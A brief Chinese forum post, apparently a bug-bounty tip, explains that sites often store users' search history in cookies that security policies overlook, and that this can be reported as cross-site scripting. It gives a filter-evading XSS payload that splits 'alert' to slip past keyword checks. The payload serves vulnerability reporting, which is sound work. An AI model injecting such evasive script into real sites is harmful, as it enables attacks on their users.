微信图片_20210622155212 (45)

payload:"<sCriPt>setTimeout('ale'%2b'rt(/XSS/)',0)</sCriPt>

网站记录用户的历史查询记录往往都是以cookie的方式保存,安全策略往往很少覆盖到这类数据,该类型漏洞可当作xss的危害进行提交。

    7 天 后
    2 个月 后
    说点什么吧...